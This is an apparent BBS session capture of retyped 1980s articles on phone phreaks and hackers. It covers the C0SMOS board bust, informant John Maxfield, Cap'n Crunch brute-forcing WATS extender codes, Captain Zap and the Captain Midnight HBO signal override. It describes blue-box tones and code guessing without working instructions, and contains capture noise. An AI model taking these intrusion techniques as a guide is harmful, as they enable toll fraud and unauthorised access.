he has talked with 'seem to be bright,
affluent and board kids."
  John Anthony, FBI spokesman in De-
troit, said authorities "have no idea
how many are involved."                   "Thats one of the problems. I don't 
think we know for sure how amny are out
there," Authony said. "These type of
crimes are hard to detect and when you
do, its usually the tip of the iceberg"

  The FBI's April 18 visit to Time 
Lords home turned up plenty, thanks to
a willing young man who admitted think-
ing like most of his friends, he would
never get caught.

  'They knocked on the door and my 
mom answered, she told me the FBI was
here to see me about Cosmos," said
Time Lord, a slender, well-spoken
young man. "I just froze right there."

  Amoung the material tunred up was a
printout of Cosmos' user list that in-
cluded such names as Ima hacker, The
(414) Wizard, The Anarchist and various
other popular hackers.

  Agents also found the youths pass-
words to other similar systems around
the country. These Included The World
of Cryton,  a Milwaukee board popular
amoung credit card theives who were
arrested last month.
 
  Time Lord talked with with agents 
from the FBI and the Secret Service 
and Farminging Hills police officer
Paul Cavan (WHO WAS OUTA HIS FUCKEN
DISTRICT AT THE TIME AND SHOULDN'T OF
BEEN THERE ANYWAYS) for a short time
before they were joined in his room by
his unwitting parents.

  "They were totally shocked. They had
no idea" said Time Lord, the oldest of
six children, who said he tried to ex-
plain to his parents why the phone rang
at all hours of the night.

  Indeed, C0SMOS built quite a rep-
utation. Newsweek mentioned it in one
of its stories about computer hackers.
Other reporters also have called since
the interrogation.

  Cosmos apparently was a pacesetter
amoung bulletin boards, Cavan said.
"Anybody interrested in setting up a
board in the Detroit area, thats the 
one they modeled it after," Cavan 
said. "There were eight levels of
access. (HA. THERE WERE NINE BUDDY!)
You could by your way up with credit
card numbers or other criminal infor-
mation." (YEAH RIGHT, YOU HAD TO PASS
A TEST TO GET ACCESS, SHOWS WHAT THIS
DUDE KNEW ABOUT IT.)

  Subject matter found on the board 
was trashing, phreaking and hacking.
This was the usual stuff you would
find on these types of boards.

  John Maxfield, (ALIAS: CABLE PAIR)
a self described 'hacker tracker' who
has compiled a list of then 1,200 com-
puter bad guys concurred.
  "These guys are real pros," said Max-
field, a computer security consultant
for several firms. "There running the
credit cards to their limit".
  "These guys have graduated from War
Games fun to a real kind of electronic
underworld," Maxfield said from his
Detroit office.

----------
Well, we all know how much the media
blows things up and you should re-
ize that this took place a while ago.
The good boards only TALK ABOUT the
way phoco works and don't post stupid
c0dzes (heh) or anything that would
get you busted. 

I hope you enjoyed reading this little
bit of information as much as I enjoyed
participating in it.
----------
For those of you who were asking what
C0SMOS communications was/is, I hope
this kinda cleared things up.
----------
            
(>To Catch A Hacker. The true story of John Maxfield, electronic private eye.
Appeared in August 1990 issue of PC Computing Magazine, by Rick Manning.


    The computer crackers and phone phreaks who visited Cable Pair's cluttered
office one August evening in 1983 must have thought they were in heaven.
    Cable Pair was a sysop for a hacker forum on the Twilight Phone, a Detroit
area computer bulletin board. The forum had become a meeting place for
members of the Inner Circle, a nationwide hacker group that used words and
swap tips on phone phreaking--getting free use of long-distance phone systems.
    Cable Pair's visitors that evening were some of the Inner Circle's most
active members, highly placed in the hacker pecking order.  They had come in
response to messages that Cable Pair had posted on the board, inviting them to
take a guided tour of his headquarters, and they were suitably impressed.
Computer equipment was everywhere.  The sysop's console consisted of several
terminals connected to a remote Hewlett-Packard minicomputer.
    In a back room was a bank of electromechanical telephone switches--old
stuff, but enough to run a phone system for a small town. Cable Pair even had
an official Bell version of the infamous "Blue Box," a device that sends out
the precisely calibrated tones that unlock long distance telephone circuits.
To
demonstrate the magic box, he keyed in a 2600 cycle per second tone and was
rewarded with the clear whisper of AT&T's long distance circuit.
    Then like jazz players in a jam session, group members took turns showing
what they could do. One tapped into AT&T's teleconfrencing system. Another
bragged about how he once nearly had Ron Reagan, Queen Elizabeth, and the pope
on the same conference call.
    One hacker's specialty was getting into Arpanet, the advanced research
network that links universities and government agencies, including defense
research centers. "The Wizard of Arpanet sat right there at that keyboard and
hacked into the system," says Cable Pair smiling at the memory. "And we
captured every keystroke."
    It was probable Cable Pair's finest hour. He was not, after all just
another hacker. The gathering that evening was the culmination of an elaborate
sting operation.
    Outside the office, FBI agents watched everyone who entered and left the
building. A few months after the jam session, police raided homes across the
country. The confiscated computers and disks and charged about a dozen adults
and teenagers with various counts of computer abuse and wire fraud.
    Cable Pair was John Maxfield, whose career as an FBI informant had started
a year earlier. Now approaching the age of 50, he is still chasing hackers,
phone phreaks, and computer pirates. When his cover was blown in a hacker
newsletter soon after the office party, he attracted a network of double
agents, people who found it more convenient and safer to work with him than
against him. Some continue to maintain their status in the hacker underground
and pass information to Maxfield.



    The nature of Maxfield's calling depends on your frame of reference. If
you've read enough cheap fiction, you might see him as a private dick in a
digital overcoat. Or a stagecoach guard sitting on the strongbox, eyes
scanning the horizon, electron gun across his knees. He refers to the hacker
phenomenon in the nebulous language of Cold War espionage, casting himself in
a spy novel role as a warrior fighting battles that both sides will deny ever
happened.
    "He's very good at getting hackers together on one thing," says Eric
Corley, editor of 2600, the hacker publication that fingered Maxfield more
than six years ago. "I can think of nothing that hackers agree on except that
John Maxfield is evil!"
    Maxfield responds in kind "Hackers are like electronic cockroaches," he
says. "You can't see them, but they're there, and at night they raid the
refrigerator." Although a lot of hackers are what Maxfield calls "tourists"--
young people who go into a system to simply look around--more sinister
influences often lurk behind them.
    "The tourist may go into a system and look around, but when he leaves,
he's got a password and he'll share it with others because he's got an ego and
wants to show how good he is," says Maxfield.
     "It's my experience that ever hacker gang has one or more adult members
who direct activities and manipulate the younger ones. What could be better
than to have the naifs doing your dirty work for you? They can open all the
doors and unlock the systems and then you go in and steal space shuttle
plans."
     The hackers are one step away from the shadowy world of spies." says
Maxfield. "Some have deliberately sought out and made contact with the KGB."
Maxfield wasn't suprised at all when West German police announced in March
1988 that they had arrested a group of computer hackers who used overseas
links to U.S. computer networks to steal sensitive data. And he thinks
computer companies and corporations haven't learned much about securing their
systems. "There are more interconnections," he says "and that leads to more
vulnerability."
    A good example was the worm that Robert T. Morris Jr., unleashed in Nov
1988 through the Unix based Internet research and defense network that shut
down more than 6000 computers.
    "The hackers will tell you that this kind of thing is just a practical
joke, a harmless prank. But in can do some very serious damage," says
Maxfield. Computer systems experts who testified at Morris's trial last Jan.
estimated that the cost of cleaning up after the chaos wreaked by the Unix
worm was $15 million!.
    The information that Maxfield collects about these computer pranksters and
criminals goes into a database that  he maintains to help him identify
hackers and monitor their activities. Maxfield tracks the phone phreaks'
identities and aliases to help his clients, who are managers at large
corporations, credit card companies, and telephone companies--business people
who feel the need to protect their electronic goods and services.
    What can Maxfield do for them? If a corporation's phone system is abused
by unauthorized users or if its computer system is invaded by hackers, he can
conduct an investigation and advise the company on how to contain the problem.
He can also tell them where their system is vulnerable and what to do about
it.
    Most of the hackers whose names and aliases are in Maxfield's database
probably are pranksters, teenagers attracted by the danger and excitement of
electronic lock-picking. Their activities would remain mostly benign, Maxfield
says, if it weren't for the organized online groups and the criminally-minded
adults that urge them on.
    "That's the real threat," he says.  "It's not the pranksters so much as
the
people they're associated with. The people who don't run bulletin boards, who
don't brag openly about what they can do.



    Maxfield could easily have become one of the hackers he now fights against
.
As a teenager growing up in Ann Arbor, Michigan, in the late 1950's he had a
comsuming passion for telephones and computers. During the summer he worked
for an independent phone equipment manufacturer and spent time hanging around
the offices of Michigan Bell. He also made some friends within Bell.
    Naturally curious, Maxfield experimented with his telephone at home and
learned how to blow fuses at distant switching stations and even how to shut
down whole portions of an exchange. By studying AT&T technical journals used
on his job and by picking up technical information from his contacts at Bell,
he learned how to make his own blue box. In 1961, when dirrect dial service
reached Ann Arbor, Maxfield was finally able to test his discovery.
    Maxfield was shocked when he realized he could make long-distance phone
calls for free. He called a friend at the phone company, and he mentioned his
triumph to other friends. Maxfield's discovery attracted the attention of some
people who offered to pay him $350 each for 1000 blue boxes.
    Word also got back to AT&T special audit inspectors through the friend at
Michigan Bell. After paying Maxfield a visit, the inspectors let him off with
a warning, but not before suggesting that it was probably the Mafia that
wanted to buy the boxes.
    "They said the records of the bookmakers' long distance calls get them
convicted in court," Maxfield recalls. If bookmakers manage to evade the
telephone company's billing equipment, of course, they not only avoid having
to
pay for the long-distance calls they make, there are no records that federal
prosecutors can use against them.
    Maxfield's prototype blue box took a midnight swim of a Huron bridge, and
the kid stayed out of trouble after that. For the next 20 years he channeled
his electronic expertise into fixing and installing phone equipment.


    In fact, Maxfield's career as a counterhacker began quite innocently, in
1978, when he helped a local computer club start one of the nations first
electronic bulletin boards. Four years later, the FBI cam looking for pirated
software.
    "I knew the pirated software wasn't in the clubs, but I also knew about
pirate bulletin boards that had sprung up in the area," Maxfield recalls. So
he printed out some of the messages from the pirate boards and took them to
the local FBI office in 1982.
    The FBI scarcely knew what to make of all of the information that Maxfield
handed them. "They were still keeping records on 3X5 index cards!" he says.
    But the bureau offered to compensate Maxfield for his expenses if he would
monitor the hacker bulletin boards and report to them.
    Maxfield accepted. The arrangement gave him what every hacker and phone
phreak would love to have...a license to hack. He could call anywhere in the
world or attack any computer and not worry about the consequences.
    Maxfield might still be undercover for the FBI today if he and his contact
at the bureau had kept their mouths shut and not underestimated the
resourcefulness of the hackers.
    Following the success of his 1983 office party and the resulting raids,
Maxfield, still undercover, got involved with a New York hacker group that had
take control of a corporate voice-mail system.
    Against the FBI's advice, Maxfield tipped off the voice-mail system
administrator, leaving a message urging him to contact the FBI. "What I didn't
know as that the hackers also had access to the system administrator's account
so they got the message first." Maxfield says.
    One of the gang members, posing as the system administrator, called the
FBI and learned enough to identify Maxfield. A story about Cable Pair's
involvement with he government appeared in the first issue of 2600 in January
1984.
    "We thought Cable Pair would be a promising contributor to this
publication," the story concluded. "Instead we learned a valuable lesson:
Don't trust ANYBODY."
    "That's when the shit hit the fan," recalls Maxfield. "I was burned six
ways from Sunday.
    "My phone was ringing off the hook with death threats," he says. "The
hackers were after me, and even the FBI didn't like me for a while."
    "It was an ignorminious finish to Maxfield's underground activities for
the government, but it launched his career as a consultant and electronic
private eye. Several hackers who were worried about how much Maxfield know
about their activities offered to become his double agents. "Some were even
more highly placed than I was, and a couple of those people are still good
sources today."
    "Hacker groups are like street gangs," he says: the hierarchy changes all
the time, and the organization is very loose.
    One way to get to the top of this shifting hierarchy is to be a sysop for
a pirate bulletin board, as Cable Pair was. Another way is to boast online
about hacking exploits ("Well, I hacked into NASA's network and figured out
how to alter the course of the Hubble Space Telescope...") or to post a lot of
pirated information on the system.
    Maxfield uses the hackers' own techniques to penetrate their private
bulletin board systems. "It's a mind game," he explains. "Hackers will seek me
out and feed me information about someone they hate or someone higher placed
that they are" just to get them out of the way. They're "absolute anarchists,"
says Maxfield.
    While Maxfield is watching the hackers, the hackers are watching him. Says
Corley, "We have a nice thick file folder on him."

    Maxfield keeps more than file folders. His database which has entries on
about 6000 suspected hackers and phone phreaks, is cross-referenced by name,
alias, phone number, gang associations, and criminal arrest record for phone
fraud. He also tracks the names and numbers of pirate BBS's--and it's all at
his fingertips.
    Maxfield downloads information from his database directly to some clients.
Others receive his periodical, which reports on hacker activities and lists
phone numbers of active hackers and pirate bulletin boards. Companies that
suspect illegal phone activity can use the list like a reverse phone
directory, comparing phone numbers on their bills against the list to isolate
the BBS from which the perpetrator is operating. Then they can work on
preparing a case for law enforcement. Very often, the same perpetrators tap
into the same system over and over, and companies that wish to prosecute must
assemble evidence over a considerable period.
    Sometimes Maxfield gets involved directly, but he says he is "not a bounty
hunter" and claims that he'll tip off corporations or phone companies about
security breaches even if they aren't clients.
    He'll even help AT&T, although his relations with the company are
strained. "They still think I'm one of the bad guys."
    Other's in the industry, however, find Maxfield's work helpful and
valuable.
    "I put a lot of trust in the work he does," says Donn Parker, a computer
crime expert at SRI International, in Menlo Park, California, and a regular
subscriber to Maxfield's reports. "He does a very good job of keeping track of
the malicious hackers and the phone phreak community."
    Maxfield often conducts computer security seminars for corporate clients
and government agencies. He can alert corporate clients to weak spots in their
systems and advise them on how to tighten their electronic security. He tells
his clients that networks are particularly vulnerable to invasion because
"when you network systems together, it's like a chain, and you need only
attack the weakest link. All you need is one site with poor security and you
have a loophole."
    Data sent over the telephone lines can also be tapped. "Some people sit on
a telephone pole or in a car holding a laptop computer wired directly into the
phone lines, picking off data and passwords," he says.
    "Computer security isn't a computer problem, It's a people problem," says
Maxfield. "And people just aren't security-conscious. The leave doors
unlocked, and they write their passwords down and tape them to the fronts of
their terminals.
    "We have the technical knowledge to secure these systems. We know how to
keep the hackers out, but it's a problem of implementation. It's expensive,
and it makes the system harder to use."
    "Any system that's user-friendly," cautions Maxfield, "is also hacker-
friendly."
    Maxfield is as addicted to his profession as the hacerks are to their
online capers. Even if he wanted to quit the business, he says, he couldn't:
"The hackers just won't leave me alone."
    Maxfield admits that sometimes it's a little scary to be the Lone Ranger
out there. Much of what he's seen and worked on can't be discussed for fear
that hackers will be onto what he's doing. But, he says, that problem is dire,
and "we've got to wake people up to this. We need to increase corporate
awareness, law enforcement awareness, and public awareness. Computer
manufacturers need to think about designing systems that are more secure, and
the phone system needs to rethink its entire network design."
    And so Maxfield feels an obligation to continue his crusade. He knows too
much to stop now.


A little info......
             This article is one of many controversial articles that is being
debated on the Master Control Program BBS. File retyped on 7/19/90 by user #1
of the MCP. Call today! (314)-993-3689.48


File: AN APPLE FOR THE CAPTAIN
 Read 22 times

 -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-
 -                         An Apple For The Captain                          -
 =                       InfoWorld -- October 1, 1984                        =
 -                            By Stephen Wozniak                             -
 =                 Word Processed for SF][ by BIOC Agent 003                 =
 -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-


   The best prank I've seen with the Apple was played by Cap'n Crunch.  John
Draper, one of Apple's first employees, was responsible for designing a
telephone board for us.  Much more than a modem, the board could send
touch-tone or pulse-dial data; it could also transmit any tones that were
programmable down the line, listen for specific sounds, and a bunch of other
things.

   At one point Draper was motivated to crack WATS extenders.  A WATS extender
is used when a company has incoming and outgoing free 800 lines.  Company
executives call in on the incoming 800 line and tap out a four-digit code,
which gets them on their company's outgoing 800 line.  They only system
protection is the four-digit code.

   It would take a long time to dial 10,000 phone calls manually, searching for
the extender code.  But Draper had designed this new telephone board, and he
knew a bunch of companies that had WATS extenders.  He programmed the Apple to
call the company on its 800 number, automatically get to the WATS extender,
type out a four-digit code, and check to see if the attempt succeeded or
failed.  The Apple with the board would listen to all the tones on the phone
line to determine when it was ringing, when it went to the WATS extender, and
so on.

   It took about 10 seconds for the Apple to dial the call and try a new
four-digit code.  The Apple would restart and try again.  And then try the next
number.  It was able to dial about 5,000 calls a night -- the average number of
calls to crack a WATS extender.  Draper cracked about 20 WATS exteders,
averaging one a night.

   The city of Mountain View, California, where he lived at the time, keeps an
index of how well the phone system is working.  An average of 30% of all calls
made from the city don't go through.  The month Draper was cracking the WATS
extenders, the index jumped to 80%!  For that month Draper made more than 50%
of the calls originating from Mountain View, California, whose population is
60,000.... <>

[Courtesy of Sherwood Forest ][ -- (914) 359-1517]

-----End of File



[1-54, Last=48, Quit=Q] Read File #
ok.
32


File: WHO IS CAPTAIN ZAP?
 Read 23 times

 -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-
 =                                                                           -
 -                   COMPUTERS:  Hacking Away at Break-Ins                   =
 =                    [Washington Post -- June 28, 1984]                     -
 -                            By David H. Rothman                            =
 =                     Word Processed by BIOC Agent 003                      -
 -                                                                           =
 -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-

   Some once-rebellious computer hackers' may be going establishment.

   A Philadephian named "Captain Zap," for example, who calls himself a
"retired electronics hobbyist," is even doing computer security.  Quite a
switch from the days when he and friends were stealing -- via computer --
hundreds of thousands of dollars in goods and services.

   Another young man simultaneously advises corporations and puts out the TAP
newsletter for hacking trying to get into big computers without authorizaition.

   Aside from the ethical questions, can such consultants help prevent
incidents such as the recent acquisition of secret passwords to a computer
storing credit data at the TRW Information Systems, Anaheim, Calif.?  Opinions
vary.

   On on hand, you normally don't hire an ex-thief to guard your safe.  But on
the other hand, a New Jersey security man says he's uncovered hacker threats --
via Zap -- to major banks and dozens of corporations.  He and a prominent
Washington-area consultant are among those who swear by Zap.  A third computer
expert working for the prestigious SRI think tank in Menlo Park, Calif., claims
hackers without the usual credentials can make first-rate security people.  The
term "hacker," he stresses, is far from synonymous with "criminal."

   Says Jay BloomBecker, a Los Angeles computer crime expert:  "It's pretty
foolish to hire a hacker who's broken the law because they've already
demonstrated their lack of trustworthiness.  There are a lot of other people
just as bright who have stayed within the law."

   Zap, whose real name is Ian A. Murphy, drew his nickname out of the air.  "I
zapped security, so I named myself that.  I tried not to destroy anything.  The
object was to show people that if I could get in, a less benign person could."

   In the names of major corporations, however, Zap and friends ordered, in the
early '80s, five Texas Instrument 787 terminals worth $3,800 each, a $13,000
Hewlett Packard minicomputer and other odds and ends.

   All together they stole over $100,000 in goods and $212,000 in services.
Zap received a $1,000 fine, 2.5 years probation and 15 hours a week of
community service.

   Despite his anti-establishment computer acts, he is a Philadelphia
Republican fond of wing tips ("they show good breeding").  His usual rates are
between $450 and $1,200 a day, plus expenses.  He says he now has six clients
through subcontracting, although his high daily rate apparently puts off many
prospects.  To earn rent money, Zap fills in as an air-conditioning repairman,
work he started in his teens when he first began taking computer-science
courses (and started hacking).

   "I kept asking Spring, Bel and the others for jobs," he says, "and they kept
turning me down.  The strange thing is that I'd call Bell and say, 'Hi there,
I bet I can get into this and that,' and they'd say, 'No, you can't.'"

   He could.  He charged phone calls to an ocean liner, and even broke into
military computer networks to play computer games.  ("They have 'Star Trek,'
'Hangman,' and 'Chess'.")

   Among those who take Zap's advice seriously:  Lindsay L. Baird Jr., a tough
ex-military policeman now in computer security consulting, and Robert P.
Cambell, once a top Army man in computer security and now head of Advanced
Information Management, Inc., Woodbridge, Va.

   "I had doubts at first," concedes Baird.  Zap read of Baird in the
Philadelphia Inquirer last year, requested a meeting, walked through Baird's
house in Mountain Lakes, N.J., and declared "You're clean."

   "In what way?"

   "No hidden recording devices or microphones," replied Zap, and pulling back
his coat to reveal a bug-detecting device.

   Baird, who believes no in The Redemption of Zap, says he has picked up items
off hackers' electronic bulleting boards that revealed in detail how to break
into the compters of a leading hospital supply firm, a food company and major
banks, among dozens of other victims.

   "The FBI knows I'm working with him," says Baird, who shares much of the
infomation that Zap uncovers.  He praises Zap as "a damn good technician."

   "We're both learning from each other," says Cambell, adding that "There is
nothing that Ian can do that my staffers can't do better, but he's developed
his talents without a formal education."

   Captain Zap, who has started his own security firm, Secure Data Systems,
tests clients' computer safeguards before "electronics hobbyists" get around to
it, as he did for a major finacial firm.

   How safe was its computer system?  "I can't tell you," says Zap.  "I'm under
a confidentiality agreement."

   Zap, one must remember, is a felon (and as of a few days ago had yet to pay
off the $1,000 fine, pleading tight finances).  Other reminders:  Federal laws
prohibit banks' hiring of felons for work too close to the money; some
government agencies may not find use of a felon-consultant to be legally or
politically possible, even through a subcontracting agreement.  Besides, not
every client can monitor the Zaps as well as a security expert.

   Despite all this, some experts maintain that people like Zap may be
excellent at simplifying techno-gook and warning the nontechnical of some of
the more common threats from crooks, malicious or snoopy hackers and other
electronic break-in artists.  The computer-room crew may rant and rave about
the need for good computer security, but that's now match for hhearing thd
facts directly from a computer felon.

   Baird plans to use Cheshire Catalyst, a New York hacker who doesn't want his
real name use ("I like my privacy") and Zap in the "Tiger Team," military term
for electronic devil's advocates to test cliens' computer security.

   Most problems, says Cheshire Catalyst, are "people problems.  People tack
passwords onto the corkboard above terminals.

   "If I cam in to deliver pizza," he declares.  "I'd memorize the number on
the way in and write it down as I left."

   A tall, thin man in his late twenties -- named after the grinning, vanishing
cat in "Alice's Adventures in Wonderland" -- Cheshire edits the TAP newsletter
(which bills itself "For Informational Purposes Only").  Even though TAP is
known as the bible for people trying to break into computer and phone systems,
Cheshire claims he himself is clean, except for logging on to systems to look
for weaknesses.

   Meanwhile, discussion of the term "hacker" seems to be excalating.  Cheshire
distinguishes between "good" and "bad" hackers, the latter of whom a few buffs
call "crackers."

   Geoffrey S.  Goodfellow -- who testified at congressional hearings on
computer crime and is a coauthor of The Hacker's Dictionary:  a Guide to the
World of Computer Wizards -- confirms that a "hacker" isn't necessarily a
"computer criminal."

   A "hacker," he says, is merely someone who truly enjoys programming.  He
stretches his machine's power to the limits, and loves to "hack away" at
computer problems.

   Not that Goodfellow thinks all hackers are 100 percent honest.  He believes
that as computer literacy spreads, more will be stealing money as well as
computer time.

   His advice to hackers' prospective clients:  "If they seem reasonable, I
advocate putting them on a loose leash.  You shouldn't take a holier-than-thou
attitude.  Unfortunately most people take the authoritarian approach...

   Goodfellow claims that hackers -- often as long-time kibitzers of computer
systems -- may see the big security picture better than many professional
programmers used to working within their niches.

   Goodfellow, 28, a high-school dropout, can offer himself as an example of
sorts.  A decade ago he dialed up a computer at SRI and left a note saying he'd
improve the system in return for free computer time.  He got it, and eventually
went full-time at SRI.  Among his clients:  the Defense Department.

   To this day, however, Goodfellow proudly calls himself a hacker. <>

(David H. Rothman is author of "The Silicon Jungle:  Computer Survival at Work
and Home" to be published by Ballantine Books early next year.)

SF][G9:ba003.010585

[Courtesy of Sherwood Forest ][ -- (914) 359-1517]

-----End of File



[1-77, Last=32, Quit=Q] Read File # is author of "The Silicon Jungle:  Computer Survival at Work
and Hollllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
  It started out as just another Saturday.  April 26, 1986.  John R.
MacDougall, 25, spent the day alone at his satellite TV dealership in Ocala,
Florida, waiting for customers who never came.  "It was," he says, "a normal
day in the doldrums of the satellite TV industry." But that night, MacDougall,
5 feet 11, 225 pounds, and prone to nervously running his fingers through his
reddish blond hair and adjusting his glasses, would transform into Captain
Midnight and set the world of satellite television spinning.

  Business had been flat since January 15, when Home Box Office became the
first pay TV service to scramble its signal full time.  Other services were
following HBO's lead.  Dish owners were balking at the cost of descramblers and
program fees.  Potential customers were confused and stayed away in droves.The
1985 boom in dish sales had simply petered out, and MacDougall Electronics, in
business for just two-and-a-half years, had seen its early profits disappear.

  American Dream

  MacDougall had stopped advertising and turned off his air-conditioner to save
money.  With no customers, he idled away the day watching TV and reading
magazines.  Later, he would say, "I have been watching the great American dream
slip from my grasp."

  To make ends meet, MacDougall spent his evenings moonlighting as a part-time
operations engineer at Central Florida Teleport, a local company that uplinks
services to satellites.  He was a natural electronics engineer.  A good
student, he had spent his spare time during his teenage years tinkering with CB
radios and automobiles.  With some pals, he rebuilt a 1923 Ford roadster that
he still owns.  He had dropped out of a management engineering course at
Worcester Polytechnical Institute in Massachusetts after two years, but his
first job was installing satellite TV dishes."My father used to tell me I would
need to get a job where I would be able to make money by watching TV just
because I liked TV so much," he says.  At Central Florida Teleport, he could do
just that.  At 4 p.m.  on that Saturday, MacDougall shut up shop.  He stopped
at his home, where he lived alone, picked up a sandwich for supper, and then
reported to the teleport.  After two hours, a second engineer went off duty and
MacDougall was alone in the small building that is flanked on one side by five
large satellite dishes.

  As the end of his shift drew near, MacDougall was absently watching Pee-Wee's
Big Adventure, a movie he was uplinking for the now-defunct pay-per-view
service, People's Choice.  But something else was on his mind.  When the film
ended, MacDougall went through the normal routine.  Before logging off, he set
up color bars and punched buttons to swing the giant 30 foot dish he'd been
using to its resting place.  That was necessary because the soil beneath the
dish's cement pad is sandy clay.  Rainfall could throw it off-kilter, but by
setting it in a certain way the rain runs harmlessly into a gutter.  At its
resting place, the dish points directly at the satellite Galaxy 1.
Transpondedr 23 on that satellite carries the eastern feed of HBO.  "That's
when I decided to do it,"says MacDougall.  "It wasn't like I thought about it,
'Yes.  No.  Yes.  No.' It was just, 'Yeah!'" He scrolled up a character
generator, and electronic keyboard that puts letters across the TV screen, and
tried to think what to write.  "I didn't know exactly how to start it," he
says.  "I wrote 'Goodevening." I wanted to be polite.  I didn't want it to be
vulgar or call them names or anything.  That's not my style."

  He spent a couple of minutes composing his message.  The idea of using the
name Captain Midnight, he says, "just popped into my mind." He had recently
seen a movie with that title about a teenager who had a pirate radio station in
his van.  Now HBO was airing the Sean Penn and Timothy Hutton espionage movie,
The Falcon and the Snowman.  It was at 12:32 a.m.  Sunday, April 27, that John
R.  MacDougall pushed the transmit button on his console and turned into
Captain Midnight.  "That's when I hit it," he says.  "It was almost like an
out-of-body experience.  It was like I was there but I wasn't really there."

  For 4 1/2 minutes, HBO viewers in the eastern United States saw this message:

                            GOODEVENING HBO
                            FROM CAPTAIN MIDNIGHT
                            $12.95/MONTH?
                            NO WAY!
                            (SHOWTIME/MOVIE CHANNEL BEWARE)

  A week earlier, MacDougall had successfully overridden HBO's powerful signal
momentarily with just a test pattern.  (He now publicly denies this, but he
admitted it to a United States attorney.) The network had quickly brushed that
signal aside, attributing it to not uncommon accidental interference.  This
time, the engineer on duty at HBO's Long Island, New York, uplink station
simply stepped up the signal's power.  HBO was transmitting at 125 watts.  When
Captain Midnight applied more power, the HBO engineer revved up to match it.
"He saw the interference and saw that he was losing a grip on things," says
George Dillon, an engineer who investigated the episode for the enforcement and
investigative division of the Federal Communications Commission.  "This little
game took 60 to 90 seconds.  You had these two people at their respective
stations fighting for control."

  As Captain Midnight's signal surged, HBO placed a frantic call to Hughes
Communications Inc., which owns Galaxy 1, asking:  "Is there something wrong
with the bird?" Says Dillon, "HBO thought it might cause damage to the
satellite, so they gave it up.

                    NEVER LOST CONTROL

  In Ocala, Captain Midnight was stunned.  "I could see my signal on top of
HBO's as soon as I hit the transmit button," says MacDougall.  "I stared at the
monitor for a while, and then I didn't know if it was two minutes or 10
minutes." Caught up with engineering curiosity, he monitored power levels and
downlink signals.  "At no time," he says, "did I lose control over the
transponder." But then, as suddenly as he had struck, he quit.  "When I shut it
off, I really didn't know how long I had been on top of HBO, but that's when I
started to feel very guilty," he says.  "I thought, "Ohmigod, what did I do?'
That thought raced through my mind for the next 10 or 15 minutes as I
reconfigured the teleport back to normal.  The guilt really set in that night.
I didn't sleep very well."

  On Sunday morning he woke up to the same nagging doubts.  "I thought maybe I
should turn myself in.  But then I thought, 'Well, let's be rational.  Nobody's
going to see it.  Nobody cares.  HBO will know.  They'll get the message.
They'll reconsider their arbitrary and unfair pricing, and maybe I'll read
about it in a few months in Satellite Orbit.  That's basically how I
rationalized, not panicking, and went on with my daily routine that Sunday.'

  Then he saw that Captain Midnight's HBO ambush was making TV's network
newscasts, and he began to panic.  "I was devastated and so nervous with
frustration.  I had to work that night at the teleport.  Another man was going
to be there for the first two hours.  When he got there I had to pretend and
say things like, "Dkid you see this guy Captain Midnight?  Geez, do you realize
what in the world, he could have done?' That was difficult."

  Normally, MacDougall's natural curiosity would have made him the first to
want to discuss how it was done.  But as the event made national headlines and
became fodder for jokes by David Letterman and Johnny Carson, he went the other
way, trying to play it down.  The tension grew as HBO clamored for his head,
and the FCC and even Congress got involved.

  On April 28, HBO chairman Michael J.  Fuchs wrote to the FCC saying that the
company had received calls threatening to move Galaxy 1 into a new orbit.  He
urged the Commission to "use all its investigative resources" to capture
Captain Midnight.

  "This wasn't just a jamming, but a jamming and replacement.  And a
fascinating one at that," says HBO spokesman Alan Levy.  "That's why you saw a
lot of action on this case.  We understand that the dish owners are at odds
with the programmers, but when you escalate it to this point, it gets a little
wild and woolly.  And when you're breaking the satellite system of the United
States, it's very serious."

  FCC investigator Dillon says the implications of the incident involved a
threat to the national security.  "There's lots of highly sensitive data
involved.  If you have a bandit, it could disrupt the business of the United
States--things like defense communications, medical information, telephone
communications, and teleconferences.

  Edgar Eagan, owner of Central Florida Teleport, took the incident very
seriously.  "He logged out and signed the log and decided to stay and play,"
says Eagan, founder and past president of ESPN, the sports network.  "In
reality he was using the equipment for an unauthorized and illegal purpose."

                      RUMORS GALORE

  As the investigation proceeded, rumors abounded.  Satellite TV publications
and television commentators received calls and tapes from people claiming to be
Captain Midnight.  The FBI was said to be on the case, and the hunt was rumored
to focus on Dallas, Texas.

  In Ocala, MacDougall had decided to "play it dumb." Discreetly, he talked to
colleagues in the satellite TV business to find out how the investigation was
going.  But gradually he could not resist discussing the incident with other
engineers and operators who talked about what happens when two signals meet on
a single transponder.  He was outraged when they dismissed his observations.

  "I don't like to say this, but even the more skilled personnel were of the
assumption that you would never get a clear signal with two signals feeding on
the same channel," MacDougall says.  "I brought out the fact that if one was
much stronger than the other, it would override it.  At that point they told me
I was wrong, and that I didn't know what I was talking about.

  "All of my life people have never taken my word for things because I've
always seemed to be a little younger than they are, and maybe a little less
experienced, but I've always come up with the right answer.  They didn't seem
to believe my theory.  Well, I guess they ought to believe it now, because I
was right."

                        THE TIP OFF

  It was a phone call made by a disgruntled dish owner from Ocala that
concentrated the FCC's investigation on the Central Florida Teleport.  Someone
claiming to be Captain Midnight was overheard by a tourist from Wisconsin at a
phone booth just off Interstate 75 in Gainesville, Florida.  The tourist
reported the conversation and the man's license plate number to the FCC.
MacDougall says the impostor was a customer of his, but he doesn't know his
last name.  Again, he was outraged.  "He was very militant about scrambling and
the cable progra business, and not tried to make out like some kind of hero, I
would still be panicking and wondering whether they were going to come and get
me."

  MacDougall's voice rises as he exclaims, "I still can't believe this guy
actually told people he was Captain Midnight and MacDougall says the only time
he broke the law was driving over the 55 mph speed limit.  "I never even bought
beer under age.  I was a model citizen," he says earnestly.

                     FCC MOVES IN

  In July, FCC investigators talked to MacDougall, asking questions that led
him to believe they knew what had happened.  He told them he hadn't done it,
and that he had no knowledge of the incident, but then he really began to
